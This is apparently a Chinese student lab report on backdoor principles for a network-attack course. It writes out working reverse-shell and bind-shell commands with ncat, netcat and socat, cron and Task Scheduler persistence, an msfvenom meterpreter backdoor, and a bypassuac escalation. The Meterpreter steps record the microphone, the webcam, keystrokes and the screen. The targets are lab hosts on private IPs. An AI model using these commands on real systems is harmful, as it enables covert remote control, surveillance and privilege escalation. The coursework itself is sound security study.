一、后门的概念 |
后门就是不经过正常认证流程而访问系统的通道。
哪里有后门呢?
二、常用后门工具 |
Windows获得Linux Shell
在Windows下使用ipconfig查看本机IP
使用ncat.exe程序打开监听ncat.exe -l -p 5327
在kali中反弹连接Windows,ncat 192.168.84.129 5327 -e /bin.sh,使用-e选项执行shell程序
在kali中使用ip addr show 查看IP
在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.84.128 5327
kali成功获得Windows的命令提示
使用nc传输数据
使用nc传输文件(将文件从kali传给Windows)
三、实验内容 |
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
最后一行添加35 * * * * /bin/netcat 192.168.84.129 5327 -e /bin/sh,意思是在每个小时的第35分钟反向连接Windows主机的5327端口。
时间到达35分的时候,如下图所示(如果使用ls命令出现问题,可以使用比较简单的whoami命令,也能验证)
关于socat:
点击任务计划程序,再点击创建任务
填写任务名,新建一个触发器,选择定时启动(当然设置其他的也行,都可以用,例如锁定计算机时)
点击操作,在程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5327 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5327,同时把cmd.exe的stderr重定向到stdout上:
创建好后任务准备就绪
到达17.22后,再次打开时,可以发现之前创建的任务已经开始运行。(记住,弹出的cmd窗口别关闭)
此时,在kali中输入输入指令socat -tcp:192.168.84.129:5327,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5327端口,此时可以发现已经成功获得了一个cmd shell
在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.84.128 LPORT=5327 -f exe > 20175327_backdoor.exe,这里的IP地址为控制端IP,即KaliIP(使用ifconfig查看),可见已经生成了后门程序“20175327_backdoor.exe”(此部分命令运行出现问题详见:实验中遇到的问题第二个。)
在Windows下执行ncat.exe -l 5327 > 20175327_backdoor.exe,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5327 > 20175327_backdoor.exe指令,通过-lv选项看到当前的连接状态,在kali中执行nc 192.168.84.129 5327 < 20175327_backdoor.exe(这里的IP为被控主机IP,即WindowsIP)下面这个图是文件传输成功的截图
传送接收文件成功,如下图所示
进入msf控制台后的界面
输入指令后的界面
设置完成之后,执行监听,并运行Windows下的后门程序,此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
使用record_mic指令可以截获一段音频(可以使用-d选项设置录制时间)
使用webcam_snap指令可以使用摄像头进行拍照(因为没有装摄像头所以没有显示,但操作基本了解,望老师见谅)
使用keyscan_start指令记录下击键的过程,使用keyscan_dump指令读取击键记录。(使用keyscan_start后就要输入,不然读取不到数据)请查看实验中遇到的问题
使用screenshot指令可以进行截屏:
通过实验一的学习,我们可以很轻松的找到shellcode的起始地址(切记要关闭地址随机化),我的起始地址是0xffffd550。把他加在这段shellcode前面,用其生成input_2文件。
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444 //这两个都是根据shellcode的指定内容来选择的。
show options
exploit
四、回答老师问题 |
了解了后门的基本原理,但还不够深入,相信在以后的学习中能够更进一步
五、实验中的问题 |
把后门文件放在win7系统里的时候,kali中的提权操作失败
使用background命令之后会自动退出到msf的命令行下,先在msf命令行下输入search bypassuac,再输入use exploit/windows/local/bypassuac,然后再输入set session (填写内容为你使用background查看到的session数值),最后输入run,当运行结果大致为图文所示内容时,在meterpreter中的getsystem操作便会成功了。
不能加载文件
下载bundler
再试就可以了
2019-2020-2 20175327 《网络对抗技术》Exp2 后门原理与实践
原文:https://www.cnblogs.com/hollfull/p/12504135.html